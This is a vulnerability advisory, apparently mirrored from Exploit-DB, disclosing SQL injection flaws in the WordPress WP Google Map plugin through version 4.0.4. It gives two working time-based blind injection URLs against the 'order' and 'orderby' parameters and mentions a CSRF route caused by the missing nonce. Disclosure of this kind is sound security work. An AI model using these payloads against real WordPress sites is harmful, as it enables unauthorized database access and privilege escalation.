WordPress Plugin Google Map < 4.0.4 - SQL Injection

  • 作者: defensecode
    日期: 2018-06-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44883/
  • # Title: WordPress Google Map Plugin < 4.0.4 - SQL Injection
    # Author: defensecode
    # Date: 2018-06-12
    # Software: WordPress WP Google Map plugin
    # Version: 4.0.4 and below
    # Vendor Status:Vendor contacted, no response
    
    # Vulnerability Description
    # The easiest way to reproduce the vulnerabilities is to visit the
    # provided URL while being logged in as administrator or another user
    # that is authorized to access the plugin settings page. Users that do
    # not have full administrative privileges could abuse the database
    # access the vulnerabilities provide to either escalate their privileges
    # or obtain and modify database contents they were not supposed to be
    # able to.
    
    # Due to the missing nonce token, the vulnerable code is also directly
    # exposed to attack vectors such as Cross Site request forgery (CSRF).
    
    # SQL injection
    # Vulnerable Function:$wpdb->get_results()
    # Vulnerable Variable:$_GET['order']
    # Vulnerable URL:
    
    http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc
    PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
    
    
    # SQL injection
    # Vulnerable Function:$wpdb->get_results()
    # Vulnerable Variable:$_GET['orderby']
    # Vulnerable URL:
    
    http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
    
    # Disclosure Timeline
    # 2018/05/11 Vulnerabilities discovered
    # 2018/05/16 Vendor contacted
    # 2018/06/08 No response
    # 2018/06/12 Advisory released to the public